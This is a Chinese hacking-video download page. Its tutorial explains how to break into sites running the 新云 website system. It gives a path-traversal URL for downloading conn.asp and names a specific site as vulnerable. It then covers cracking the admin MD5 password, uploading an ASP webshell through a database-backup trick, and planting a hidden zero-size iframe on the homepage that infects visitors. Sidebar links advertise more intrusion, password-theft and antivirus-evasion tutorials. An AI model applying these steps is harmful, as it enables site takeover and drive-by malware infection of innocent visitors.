![]() |
利用网站漏洞获得webshell然后挂马
软件简介

大家好,我的网名是:毒血
今天给大家演示一下如何利用漏洞获得网站webshell,然后挂马的过程。
是个比较完整的过程,这个比较适合新手学习。
过程:
1、了解网站系统的漏洞。
这里以《新云网站系统》为例。新云曾经出了个可以直接下载CONN.ASP获得数据库信息的漏洞
输入 http://你的域名/flash/downfile.asp?url=uploadfile/../../conn.asp就可以直接下载文件。
这个网站http://www.chaogeng.uicp.cn/就这个漏洞,我们把conn.asp下载下来。
2、获得后台密码
从conn.asp文件读取数据库的位置后,然后将其下载下来。如不能直接下,就用讯雷。
打开admin这个表,把密文复制下来,然后用在线MD5破解出来。
刚才是因为我下过了的,所以出现那样的情况。
3、获得webshell
用刚才得到的管理员账户登陆后台,把asp木马上传上去,注意先要把木马改下后缀名,这样才
能传上去,然后再备份数据库,还原成asp格式的。OK后,直接访问我们的木马地址。现在我们可以对
网站可以随意控制和操作了。
4、配置要挂的木马
我们以问道的 木马为例。生成服务端后上传到网站上。
5、配制网马
打开网马生成器,填如刚才生成的木马的地址,生产木马网页。然后上传到网站。
6、挂马
挂马比较简单了,编辑网站首页,然后插入<iframe src=“网页木马地址” width=0 height=0></iframe> 。这样就完成了。别人打开这个网站的首页的时候就中马了。
当然,还可以利用webshell 可以提权获得服务器的权限,就获得肉机了.
谢谢大家观看,动画到此结束。
软件下载地址
-  电信下载1
特别说明:本站软件全部为本地下载,没有外链它站资源,已做杀毒处理,搜集自互联网络,版权归原作者所有,谢绝各种插件捆绑业务!
!!!因本站软件之特殊性,有些会被某些杀毒软件报告为病毒,多属于正常误报,若有疑问请联系我们,谢谢!!!
合作伙伴
相关动画
动网遍历目录漏洞
SHOPEX最新漏洞利用
批量入侵PHP网站
无意中发现365SF漏洞
推荐动画
· delphi窗体组件第二课
· delphi窗体组件第一课
· 入侵传奇SF教程
· 网吧提权+不要钱上网
· 揭穿回忆刷QB工具教程
· 盗连Network电视地址亲手打
· SHOPEX最新漏洞利用
· 批量入侵PHP网站
· 鸽子上兴通用超强免杀
· 最新免费拿半年QQ秀
· XP优化以及各种优化工具
· 如何盗取网银密码
· Domain简单网站入侵
· 免费QQ客服自动回复
热门动画
· 入侵传奇SF教程 (3250)
· 易语言flash播放器语音教 (1203)
· 网吧提权+不要钱上网 (5408)
· 批量入侵笑天网站管理系 (583)
· 揭露入侵黑鹰基地数据库 (675)
· 揭穿回忆刷QB工具教程 (7878)
· 盗连Network电视地址亲手打 (1152)
· 008基地破解木马专卖店免 (1105)
· 如何免费使用红娘的VIP (879)
· 批量入侵PHP网站 (2015)
· 虚拟机安装 (1683)
· 鸽子上兴通用超强免杀 (1003)
· 最新免费拿半年QQ秀 (1274)
· 合法赚QB (1048)

